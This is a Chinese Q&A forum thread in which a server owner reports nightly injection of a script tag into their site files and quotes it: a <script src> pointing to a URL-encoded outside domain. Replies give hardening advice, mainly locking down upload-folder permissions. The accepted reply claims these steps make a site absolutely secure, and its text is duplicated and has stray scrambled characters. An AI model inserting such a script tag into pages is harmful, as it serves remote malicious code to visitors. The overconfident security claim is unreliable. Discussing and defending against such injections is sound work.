我的服务器上面所有网站经常被人注入代码,怎么办?
我的服务器上面所有网站经常被人注入代码,怎么办?代码是这行,谁帮我翻译一下<scriptsrc=http://%6A%69%61%79%69%66%61%6E%2E%63...
我的服务器上面所有网站经常被人注入代码,怎么办?代码是这行,谁帮我翻译一下<script src=http://%6A%69%61%79%69%66%61%6E%2E%63%6E></script>
所注入的文件有HTM PHP ASP 等
不是网站数据库注入,也不是网站程序漏洞吧!我用的是DZ7.0 的程序建站的,还有的RAR文件也给注入。服务器端口扫描就一个MYSQL 有漏洞 。服务器用的360安全卫士 和 NOD32 服务器版杀毒软件 我的站www.GD169.COM 这个是DZ6.1 http://bbs.ec0752.com 是 DZ7.0 基本每天晚上4:00-5:00 都有人注入攻击。每天我都要覆盖一次,晕 展开
所注入的文件有HTM PHP ASP 等
不是网站数据库注入,也不是网站程序漏洞吧!我用的是DZ7.0 的程序建站的,还有的RAR文件也给注入。服务器端口扫描就一个MYSQL 有漏洞 。服务器用的360安全卫士 和 NOD32 服务器版杀毒软件 我的站www.GD169.COM 这个是DZ6.1 http://bbs.ec0752.com 是 DZ7.0 基本每天晚上4:00-5:00 都有人注入攻击。每天我都要覆盖一次,晕 展开
4个回答
展开全部
服务器的安全策略一定要做好。
另外不要在服务器上边运行不相关的软件或者网页
另外不要在服务器上边运行不相关的软件或者网页
参考资料: http://hi.baidu.com/zhao1yi1987
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
上海国想
2024-12-02 广告
如果服务器被攻击,上海国想科技发展有限公司应立即采取以下措施:首先,启动应急预案,隔离受感染的系统,防止攻击扩散。其次,分析攻击源,确定攻击方式和目的,以便采取针对性的防御措施。然后,加强服务器的安全防护,如更新补丁、配置防火墙规则、使用防...
点击进入详情页
本回答由上海国想提供
展开全部
是网站数据库的注入攻击么?那你在使用数据库时全部使用存储过程来操作数据库就可以屏蔽掉注入攻击了!!
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
网站的安全配置与木马工作原理:
黑客入侵网站,主要是通过图片上传功能,把木马程序传到网站里;
然后直接访问木马程序,就可以实现程序程序的控制了;
所以第一步,我们就是尽量防止asp类型的程序直接上传;这个一般程序都做了相关的设置;但魔高一尺道高一丈;尽链蚂管我们做了设置,对一些道行高的黑客还是可以上传;
他们有时是把木马改成jpg或gif图片进行上传;因为我们不会限制图片的上传;
所以我们做第二步工作
无论是图片也好;asp文件也好;它上传到空间的第一个地方就是我们专门用来存放上传图片的文件夹里
这是木马的第一个落脚点
所以我们只要限制存放图片的文件权的执行权限;就行了
这样木马文件到了网站上就是一个普通的文本文件,不起到作用;
所以我们是把所有存棚汪埋放上传图片的文件夹全部取消执行权限;
这样木马就算上传也是死马
这时黑客为了执行已上传的木马;就是把木马搞活;就会采用移动的方法;把文件移到文件夹外;或别的文件夹
这样木马就活了
能做到这步的黑客应是高手了
所以我们还有第三步
就是去掉整站的写入权限;
只给存放图片的文件夹写入权限 (如果数据库是access要给库文件写和改的权限)
其它的文件都不给写入权限
这样木马文件就无法从图片文件夹里移出了
因为别的地方不给写,就让木马移不了;最终死在图片文件夹里
这样我们就是根上解决了黑客入侵的问题;
当然如果服务器被入侵了,就没有办法;
否则我们网站就是决对安全的
这就是黑客的入侵和我们的对应方略;您如果掌握后,以陵帆后无论您做什么站都不怕了
一个相对简单的而最有效的操作:
自己加信息和图片时把网站的fso权限打开;平时把网站的fso权限关了,这样就行了。
黑客入侵网站,主要是通过图片上传功能,把木马程序传到网站里;
然后直接访问木马程序,就可以实现程序程序的控制了;
所以第一步,我们就是尽量防止asp类型的程序直接上传;这个一般程序都做了相关的设置;但魔高一尺道高一丈;尽链蚂管我们做了设置,对一些道行高的黑客还是可以上传;
他们有时是把木马改成jpg或gif图片进行上传;因为我们不会限制图片的上传;
所以我们做第二步工作
无论是图片也好;asp文件也好;它上传到空间的第一个地方就是我们专门用来存放上传图片的文件夹里
这是木马的第一个落脚点
所以我们只要限制存放图片的文件权的执行权限;就行了
这样木马文件到了网站上就是一个普通的文本文件,不起到作用;
所以我们是把所有存棚汪埋放上传图片的文件夹全部取消执行权限;
这样木马就算上传也是死马
这时黑客为了执行已上传的木马;就是把木马搞活;就会采用移动的方法;把文件移到文件夹外;或别的文件夹
这样木马就活了
能做到这步的黑客应是高手了
所以我们还有第三步
就是去掉整站的写入权限;
只给存放图片的文件夹写入权限 (如果数据库是access要给库文件写和改的权限)
其它的文件都不给写入权限
这样木马文件就无法从图片文件夹里移出了
因为别的地方不给写,就让木马移不了;最终死在图片文件夹里
这样我们就是根上解决了黑客入侵的问题;
当然如果服务器被入侵了,就没有办法;
否则我们网站就是决对安全的
这就是黑客的入侵和我们的对应方略;您如果掌握后,以陵帆后无论您做什么站都不怕了
一个相对简单的而最有效的操作:
自己加信息和图片时把网站的fso权限打开;平时把网站的fso权限关了,这样就行了。
本回答被提问者采纳
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
找服务商处理。
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询
